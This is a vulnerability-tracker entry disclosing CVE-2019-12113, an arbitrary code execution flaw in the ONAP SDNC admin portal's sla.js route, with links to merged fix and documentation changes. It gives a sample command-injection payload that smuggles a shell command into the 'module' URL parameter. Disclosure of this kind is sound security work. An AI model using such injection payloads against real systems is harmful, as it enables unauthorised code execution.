Details
-
Sub-task
-
Status: Public disclosure
-
Highest
-
Resolution: Done
-
Casablanca Maintenance Release, Casablanca
-
CVE-2019-12113
-
-
OJSI-SDNC
-
SDNC El Alto Sprint 1
Description
SDNC allows any user/logged for arbitrary code
execution in form.
Sample payload below.
Path: sdnc-oam/admportal/server/router/routes/sla.js:336
Url: http://<IP>:30201/sla/printAsGv?module=|| touch /tmp/printAsGv #
Attachments
| # | Subject | Branch | Project | Status | CR | V |
|---|---|---|---|---|---|---|
| 88626,4 | Issue OSA for OJSI-43 | master | osa | Status: MERGED | +2 | +1 |
| 89449,1 | Document OJSI-43 (CVE-2019-12113) vulnerability | master | sdnc/oam | Status: MERGED | +2 | +1 |